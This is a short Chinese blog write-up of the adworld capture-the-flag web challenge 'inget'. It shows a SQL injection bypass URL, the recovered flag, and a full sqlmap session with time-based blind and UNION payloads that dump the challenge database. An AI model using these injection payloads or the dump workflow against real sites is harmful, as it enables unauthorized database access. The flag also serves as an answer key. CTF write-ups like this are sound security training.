adworld-web-inget-20221226
创始人
2024-05-01 11:26:38
0

inget

题目来源: 宜兴网信办

题目描述:

题目场景:

http://61.147.171.105:51222

http://61.147.171.105:51222/?id=1%27%20%20or%201=1%20–+

Please enter ID,and Try to bypass

nice : congratulations

Flag Is : cyberpeace{3df1eecfb5f794d6a94eba429f7e2846}

image-20221226134703625

┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/inget]
└─$ sqlmap -u ‘http://61.147.171.105:51222/?id=1’ --dump
___
H
___ [.]__ ___ ___ {1.6.10#stable}
|_ -| . [‘] | .’| . |
|| [(]|||__,| |
|
|V… |
| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:48:20 /2022-12-26/

[13:48:21] [INFO] resuming back-end DBMS ‘mysql’
[13:48:21] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1’ AND (SELECT 3300 FROM (SELECT(SLEEP(5)))mjGn) AND ‘TmJv’='TmJv

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x717a627171,0x564c495a6873625150554d5946684c5154454d797558544c7277594b565946744e774f496f756757,0x7162627a71),NULL-- -

[13:48:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[13:48:21] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:48:21] [INFO] fetching current database
[13:48:21] [INFO] fetching tables for database: ‘cyber’
[13:48:21] [INFO] fetching columns for table ‘cyber’ in database ‘cyber’
[13:48:21] [INFO] fetching entries for table ‘cyber’ in database ‘cyber’
Database: cyber
Table: cyber
[1 entry]
±—±---------------------------------------------±----------------+
| Id | pw | user |
±—±---------------------------------------------±----------------+
| 3 | cyberpeace{3df1eecfb5f794d6a94eba429f7e2846} | congratulations |
±—±---------------------------------------------±----------------+

[13:48:21] [INFO] table ‘cyber.cyber’ dumped to CSV file ‘/home/kwkl/.local/share/sqlmap/output/61.147.171.105/dump/cyber/cyber.csv’
[13:48:21] [INFO] fetched data logged to text files under ‘/home/kwkl/.local/share/sqlmap/output/61.147.171.105’

[*] ending @ 13:48:21 /2022-12-26/

相关内容

热门资讯

喜欢穿一身黑的男生性格(喜欢穿... 今天百科达人给各位分享喜欢穿一身黑的男生性格的知识,其中也会对喜欢穿一身黑衣服的男人人好相处吗进行解...
发春是什么意思(思春和发春是什... 本篇文章极速百科给大家谈谈发春是什么意思,以及思春和发春是什么意思对应的知识点,希望对各位有所帮助,...
网络用语zl是什么意思(zl是... 今天给各位分享网络用语zl是什么意思的知识,其中也会对zl是啥意思是什么网络用语进行解释,如果能碰巧...
为什么酷狗音乐自己唱的歌不能下... 本篇文章极速百科小编给大家谈谈为什么酷狗音乐自己唱的歌不能下载到本地?,以及为什么酷狗下载的歌曲不是...
家里可以做假山养金鱼吗(假山能... 今天百科达人给各位分享家里可以做假山养金鱼吗的知识,其中也会对假山能放鱼缸里吗进行解释,如果能碰巧解...
华为下载未安装的文件去哪找(华... 今天百科达人给各位分享华为下载未安装的文件去哪找的知识,其中也会对华为下载未安装的文件去哪找到进行解...
四分五裂是什么生肖什么动物(四... 本篇文章极速百科小编给大家谈谈四分五裂是什么生肖什么动物,以及四分五裂打一生肖是什么对应的知识点,希...
怎么往应用助手里添加应用(应用... 今天百科达人给各位分享怎么往应用助手里添加应用的知识,其中也会对应用助手怎么添加微信进行解释,如果能...
客厅放八骏马摆件可以吗(家里摆... 今天给各位分享客厅放八骏马摆件可以吗的知识,其中也会对家里摆八骏马摆件好吗进行解释,如果能碰巧解决你...
苏州离哪个飞机场近(苏州离哪个... 本篇文章极速百科小编给大家谈谈苏州离哪个飞机场近,以及苏州离哪个飞机场近点对应的知识点,希望对各位有...